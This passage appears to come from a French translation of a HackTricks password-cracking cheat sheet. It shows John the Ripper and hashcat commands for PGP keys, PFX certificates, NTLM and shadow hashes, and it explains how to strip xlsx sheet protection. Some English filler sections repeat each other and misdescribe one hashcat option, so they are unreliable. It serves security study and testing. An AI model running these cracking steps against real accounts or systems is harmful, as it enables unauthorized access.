dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d

Clé privée PGP/GPG

gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash

Cisco

Clé maître DPAPI

Utilisez https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py puis john

Colonne protégée par mot de passe dans Open Office

Si vous avez un fichier xlsx avec une colonne protégée par un mot de passe, vous pouvez la déprotéger :

  • Téléchargez-le sur Google Drive et le mot de passe sera automatiquement supprimé
  • Pour le supprimer manuellement :
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .

Certificats PFX

# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Outils

Exemples de hash : https://openwall.info/wiki/john/sample-hashes

Identification de hash

hash-identifier
> <HASH>

Listes de mots

Outils de génération de listes de mots

  • kwprocessor: Générateur avancé de séquences de touches avec des caractères de base configurables, une disposition de touches et des itinéraires.
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt

Mutation de John

Lisez /etc/john/john.conf et configurez-le

john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules

Hashcat

Attaques Hashcat

  • Attaque par liste de mots (-a 0) avec des règles

Hashcat est déjà livré avec un dossier contenant des règles mais vous pouvez trouver d'autres règles intéressantes ici.

hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
  • Attaque de combinaison de listes de mots

Il est possible de combiner 2 listes de mots en 1 avec hashcat.
Si la liste 1 contenait le mot "hello" et que la deuxième contenait 2 lignes avec les mots "world" et "earth". Les mots helloworld et helloearth seront générés.

# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt

# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
  • Attaque par masque (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d

hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.

# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
  • Attaque Wordlist + Masque (-a 6) / Masque + Wordlist (-a 7)
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d

# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt

Modes Hashcat

hashcat --example-hashes | grep -B1 -A2 "NTLM"

Brute Forcing

Introduction

Brute forcing is a common technique used to crack passwords by systematically attempting all possible combinations of characters until the correct one is found. In the context of cracking Linux hashes from the /etc/shadow file, brute forcing involves trying different password combinations to find the one that matches the hashed password stored in the file.

Tools

There are various tools available for brute forcing passwords, such as John the Ripper, Hashcat, and Hydra. These tools can be used to automate the process of generating and testing password combinations against the hashed passwords in the /etc/shadow file.

Methodology

  1. Obtain the Hash: First, you need to obtain the hashed password from the /etc/shadow file on the target Linux system.

  2. Select a Tool: Choose a suitable password cracking tool like John the Ripper or Hashcat based on your requirements and the type of hash you are trying to crack.

  3. Generate Password Combinations: Use the selected tool to generate password combinations based on criteria such as character sets, length, and complexity.

  4. Brute Force Attack: Initiate the brute force attack using the tool, which will systematically test each generated password against the hashed password until a match is found.

  5. Crack the Password: Once the correct password is identified, you can use it to gain unauthorized access to the target system.

Conclusion

Brute forcing Linux hashes from the /etc/shadow file can be a time-consuming process, especially for complex passwords. However, with the right tools and methodology, it is possible to crack hashed passwords and gain access to the target system.

500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems

Brute-Force

Description

Brute-force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is commonly used to crack Windows hashes.

Tools

  • John the Ripper: A popular password-cracking tool that can be used for brute-force attacks.
  • Hashcat: Another powerful tool for password cracking that supports various algorithms and attack types.

Techniques

  1. Dictionary Attack: Involves using a predefined list of words as potential passwords.
  2. Mask Attack: Allows for customizing the brute-force attack by specifying the password's format.
  3. Hybrid Attack: Combines dictionary words with brute-force techniques to increase the chances of success.

Resources

3000 | LM                                               | Operating-Systems
1000 | NTLM                                             | Operating-Systems

Brute-Force

Description

Brute-force attacks are a common method used to crack hashes. This technique involves trying all possible combinations of characters until the correct one is found. Brute-force attacks can be time-consuming but are effective against weak passwords.

Tools

  • Hashcat: A popular password cracking tool that supports multiple hashing algorithms.
  • John the Ripper: Another widely used password cracking tool that can perform brute-force attacks.
  • Hydra: A tool known for its ability to perform brute-force attacks on various protocols and services.

Methodology

  1. Generate Wordlist: Create a wordlist containing possible passwords based on common patterns, dictionaries, and rules.
  2. Select Hash Algorithm: Identify the hashing algorithm used to generate the hash.
  3. Run Brute-Force Attack: Use a password cracking tool to run a brute-force attack against the hash.
  4. Optimize Attack: Adjust the attack parameters, such as password length and character set, to improve efficiency.
  5. Crack Hash: Once the correct password is found, the hash is cracked, and the plaintext password is revealed.

Example

hashcat -m 0 hash.txt wordlist.txt

This command uses Hashcat to perform a brute-force attack (-m 0) against the hashes stored in hash.txt using the wordlist wordlist.txt.

900 | MD4                                              | Raw Hash
0 | MD5                                              | Raw Hash
5100 | Half MD5                                         | Raw Hash
100 | SHA1                                             | Raw Hash
10800 | SHA-384                                          | Raw Hash
1400 | SHA-256                                          | Raw Hash
1700 | SHA-512                                          | Raw Hash
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

D'autres façons de soutenir HackTricks :


Utilisez Trickest pour construire et automatiser facilement des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}